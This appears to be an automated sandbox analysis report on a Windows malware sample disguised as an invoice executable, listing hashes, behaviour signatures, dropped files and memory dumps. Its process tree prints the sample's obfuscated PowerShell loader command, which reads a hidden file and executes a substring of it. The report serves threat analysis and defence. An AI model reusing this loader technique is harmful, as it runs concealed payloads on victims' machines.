Overview

overview

10

Static

static

3

factura_24...00.exe

windows7-x64

7

factura_24...00.exe

windows10-2004-x64

10

$PLUGINSDI...ec.dll

windows7-x64

3

$PLUGINSDI...ec.dll

windows10-2004-x64

8

Sightfulness.ps1

windows7-x64

3

Sightfulness.ps1

windows10-2004-x64

8

Analysis

  • max time kernel
    121s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    17/02/2025, 10:00

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    factura_2404047141_2024-09-17T02_00.exe

  • Size

    686KB

  • MD5

    5a38c30a54b3b6f72907b334a5ce8e1a

  • SHA1

    568a123c1b4b5f8b09aef5603c19ceccb4b54850

  • SHA256

    4a4bde620f7d6baf02442d09999d40123bfa471e99fcb53d3617132b678bb6cb

  • SHA512

    719f1b1c287eceefbd56ab5527fa2ba623941f53ae83364ad247b6b9a6572fe12135584dffee46e9959d544f44904d437c1bf1ca252186409bef41cd9de55b80

  • SSDEEP

    12288:7PCMC15K0rytFYPwzrjfa7LvgdtZ+/qb48R15Skemda90xTM:7CM8V+tuPmzaIdt4Ck8Lgkem1xQ

Score
7/10
discoveryexecution

Malware Config

Signatures

  • Loads dropped DLL 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\factura_2404047141_2024-09-17T02_00.exe
    "C:\Users\Admin\AppData\Local\Temp\factura_2404047141_2024-09-17T02_00.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2856
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle minimized "$Smergelpulveret=gc -Raw 'C:\Users\Admin\AppData\Local\Matens\Sexifid126\Sightfulness.Att';$Ationsprogrammet=$Smergelpulveret.SubString(52797,3);.$Ationsprogrammet($Smergelpulveret)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2816

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • \Users\Admin\AppData\Local\Temp\nst77FE.tmp\nsExec.dll
    Filesize

    6KB

    MD5

    b5a1f9dc73e2944a388a61411bdd8c70

    SHA1

    dc9b20df3f3810c2e81a0c54dea385704ba8bef7

    SHA256

    288100583f65a2b7acfc0c7e231c0e268c58d3067675543f627c01e82f6fd884

    SHA512

    b9c8d71b5da00f2aff7847b9ec3bd8a588afeb525f47a0df235b52f7b2233edb3928a2c8e0b493f287c923cc52a340ad6fee99822595d6591df0e97870de92a8

    Download Submit

  • memory/2816-24-0x00000000743E1000-0x00000000743E2000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2816-25-0x00000000743E0000-0x000000007498B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2816-26-0x00000000743E0000-0x000000007498B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2816-27-0x00000000743E0000-0x000000007498B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2816-28-0x00000000743E0000-0x000000007498B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2816-29-0x00000000743E0000-0x000000007498B000-memory.dmp

    Filesize

    5.7MB

    Download